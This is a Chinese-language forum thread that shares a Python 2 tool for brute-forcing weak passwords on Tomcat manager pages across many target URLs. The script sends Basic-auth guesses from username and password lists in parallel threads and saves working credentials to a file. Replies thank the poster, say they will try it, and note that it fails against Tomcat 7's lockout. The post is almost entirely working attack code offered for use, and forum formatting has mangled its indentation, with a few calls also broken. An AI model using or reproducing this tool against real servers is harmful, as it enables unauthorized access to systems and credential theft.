打印 上一主题 下一主题

[Linux环境] tomcat批量弱口令爆破工具(py版)

[复制链接]
跳转到指定楼层
1#
查看4868 | 回复6 | 2017-7-31 17:32:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式


[mw_shl_code=python,true]#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
import threading
import Queue
import time
import base64
import os
#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open('url.txt','r')
def urllist():
? ???for url in urls:
? ?? ?? ?url=url.rstrip()
? ?? ?? ?u.put(url)
def namelist():
? ???names=open('name.txt','r')
? ???for name in names:
? ?? ?? ?name=name.rstrip()
? ?? ?? ?n.put(name)

def passlist():
? ???passwds=open('pass.txt','r')
? ???for passwd in passwds:
? ?? ?? ?passwd=passwd.rstrip()
? ?? ?? ?p.put(passwd)

def weakpass(url):
? ???namelist()
? ???while not n.empty():
? ?? ?? ?name =n.get()
? ?? ?? ?#print name
? ?? ?? ?passlist()
? ?? ?? ?while not p.empty():
? ?? ?? ?? ? good()
? ?? ?? ?? ? #name = n.get()
? ?? ?? ?? ? passwd = p.get()
? ?? ?? ?? ? #print passwd
? ?? ?? ?? ? headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}
? ?? ?? ?? ? try:
? ?? ?? ?? ?? ???r =requests.get(url,headers=headers,timeout=3)
? ?? ?? ?? ?? ???#print r.status_code
? ?? ?? ?? ?? ???if r.status_code==200:
? ?? ?? ?? ?? ?? ?? ?print '[turn] ' +url+' '+name+':'+passwd
? ?? ?? ?? ?? ?? ?? ?f = open('good.txt','a+')
? ?? ?? ?? ?? ?? ?? ?f.write(url+' '+name+':'+passwd+'\n')
? ?? ?? ?? ?? ?? ?? ?f.close()
? ?? ?? ?? ?? ???else:
? ?? ?? ?? ?? ?? ?? ?print '[false] ' + url+' '+name+':'+passwd
? ?? ?? ?? ? except:
? ?? ?? ?? ?? ???print '[false] '??+ url+' '+name+':'+passwd

def list():
? ???while u.empty():
? ?? ?? ?url = u.get()
? ?? ?? ?weakpass(name,url)

def thread():
? ???urllist()
? ???tsk=[]
? ???for i in open('url.txt').read().split('\n'):
? ?? ?? ?i = i + '/manager/html'
? ?? ?? ?t = threading.Thread(target=weakpass,args=(i,))
? ?? ?? ?tsk.append(t)
? ???for t in tsk:
? ?? ?? ?t.start()
? ?? ?? ?t.join(1)
? ?? ?? ?#print "current has %d threads" % (threading.activeCount() - 1)
def good():
? ???good_ = 0
? ???for i in open('good.txt').read().split('\n'):
? ?? ?? ?good_+=1
? ???os.system('title "weakpass------good:%s"' % (good_))

if __name__=="__main__":
? ? # alllist()
? ???thread()[/mw_shl_code]
分享到:? QQ好友和群QQ好友和群
收藏收藏1
2#
匿名 黑殇 | 2017-8-1 10:38:54 | 只看该作者
不错,很使用
3#
Jesen | 2017-8-1 13:26:58 | 只看该作者
+1
有人的地方就有我。
4#
whbill | 2018-4-18 15:54:45 | 只看该作者
不错,试试
5#
kombat | 2018-10-1 23:14:56 | 只看该作者
不错 试试看
6#
Free雅轩 | 2018-10-16 23:03:03 | 只看该作者
不能破tomcat7版本自带的锁定机制
7#
Sniper | 7?小时前 | 只看该作者
看看代码,学习学习
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则